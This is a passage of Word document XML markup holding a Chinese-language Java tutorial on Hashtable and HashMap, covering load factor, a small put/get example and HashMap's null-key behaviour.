          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>。添加数据使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>put(key, value)</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>，取出数据使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>get(key)</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>，这两个基本操作的时间开销为常数。</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>    Hashtable</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>initial capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>load factor</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>两个参数调整性能。通常缺省的</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>load factor 0.75</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>较好地实现了时间和空间的均衡。增大</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>load factor</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>可以节省空间但相应的查找时间将增大，这会影响像</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>put</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>这样的操作。</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Hashtable</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的简单示例如下，将</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>放到</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Hashtable</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>中，他们的</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>分别是</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>”one”</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>”two”</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>”three”</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Hashtable numbers = new Hashtable();</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>numbers.put(“one”, new Integer(1));</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>numbers.put(“two”, new Integer(2));</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>numbers.put(“three”, new Integer(3));</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">　　要取出一个数，比如</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>，用相应的</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Integer n = (Integer)numbers.get(“two”);</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>System.out.println(“two = ” + n);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t>1.    HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>概述：</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t>   HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>是基于哈希表的</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Map</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>接口的非同步实现。此实现提供所有可选的映射操作，并允许使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>值和</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>键。此类不保证映射的顺序，特别是它不保证该顺序恒久不变。</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t>2.    HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的数据结构：</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t>    HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>实际上是一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
